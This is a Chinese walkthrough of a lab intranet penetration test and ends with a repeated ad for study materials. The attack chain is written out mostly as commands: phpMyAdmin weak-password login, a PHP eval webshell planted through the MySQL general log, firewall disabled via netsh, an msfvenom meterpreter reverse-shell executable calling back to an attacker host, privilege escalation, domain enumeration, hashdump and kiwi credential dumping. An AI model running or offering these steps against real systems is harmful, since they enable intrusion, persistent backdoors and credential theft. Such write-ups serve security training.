内网两台不出网win互通
win7开启phpstudy
win11访问80端口得到phpstudy探针

### 二、外网渗透
#### 信息收集
#### 端口扫描
nmap -A -p -min-rate 10000 192.168.43.17
#发现开启了80,3306端口
#访问发现80端口是php探针
#得到了探针的绝对路径 C:/phpst2016/WWW/l.php


#### 目录爆破
dirsearch -u http://192.168.43.17
#出了一些有用信息
#phpMyadmin,phpinfo.php,l.php,

#### 访问phpMyadmin
#发现是一个后台界面
#直接弱口令登录成功
root root

#### 弱口令登录成功

#### 拿到webshell
#通过日志文件写入一句话来获取webshell:
#写入webshell-网站根目录下shell,把日志log改为php
SET global general_log = ‘ON’
SET global general_log_file= ‘C:/phpst2016/WWW/shell.php’
select “<?php eval($\_POST['111']);?>”



#### 蚁剑连接shell.php
#打开蚁剑
#新建连接
#输入URL:http://192.168.43.17/shell.php
#输入密码:111

#### 信息收集
#发现目标存在yxcms,尝试访问
#在首页发现了后台地址和管理员账密

#### 进入yxcms后台
#网址输入:http://192.168.43.17/yxcms/index.php?r=admin
#admin
#123456

#### 利用文件上传

#### 蚁剑连接
#小提一下,马子上传了,不知道马子绝对路径怎么办?
#前面我们不是发现phpstudy文件夹下存在beifen.rar
#猜测应该是yxcms的备份文件
#解压之后,可通过查找acomment.php文件来确定文件上传的路径
#/yxcms/protected/apps/default/view/default

#URl:http://192.168.43.17/yxcms/protected/apps/default/view/default/cmsshell.php

至此,已经拿到Webshell
### 三、后渗透
后渗透阶段,当我们已经将小马上传到web服务器上时,可以用webshell管理工具进行下一步渗透了。
#### 蚁剑终端关闭win7防火墙
#关闭win防火墙
netsh advfirewall set allprofiles state off
#查看防火墙配置状态
netsh advfirewall show allprofile state


#### msf生成exe并开启监听
#kali创建后门程序
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.33 LPORT=10888 -f exe -o 233.exe
#蚁剑上传233.exe
#蚁剑终端运行233.exe
#kali开启监听,设置sessions
use exp/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.43.33
set lport 10888
run


#### 拿到win7shell
#尝试提权
#因为是administrator用户,
#所以很容易提权成功。
shell
getuid
getsystem
getuid

#### 利用msf进行内网信息收集
chcp 65001 —可解决乱码问题
route print —锁定内网C段
net time /domain —锁定域控192.168.52.138
net user /domain —锁定域内五个账户
ipconfig /all —锁定域名
net view —锁定域内主机
net group “domain admins” /domain —查询域管理员
域名:god.org 域内五个用户:Administrator、Guest、liukaifeng01、ligang、krbtgt 域内三台主机:OWA(win2k8)、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7) 域控:OWA(192.168.52.138) win7内网ip:192.168.52.143



#### hashdump
hashdump —导出本地用户账号密码,该命令的使用需要系统权限。

#CMD5解密
—#hash解密为空:
—#因为当系统为win10或2012R2以上时,
—#默认在内存缓存中禁止保存明文密码,密码字段显示为null,
—#需要修改注册表等用户重新登录后才能成功抓取。

#### 抓取域内账密
#利用msf的kiwi模块+system权限
load kiwi #加载kiwi模块
help kiwi #查看kiwi模块的使用
creds_all #列举所有凭据
creds_kerberos #列举域内账密 Administrator admin@123


#### CS上线win7
## 最后
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**





**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.youkuaiyun.com/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
94)]
[外链图片转存中...(img-bs5CJMPA-1715799030494)]
[外链图片转存中...(img-LapUTIUl-1715799030494)]
[外链图片转存中...(img-Uy8moZFm-1715799030494)]
[外链图片转存中...(img-lYGh1AN8-1715799030495)]
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.youkuaiyun.com/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**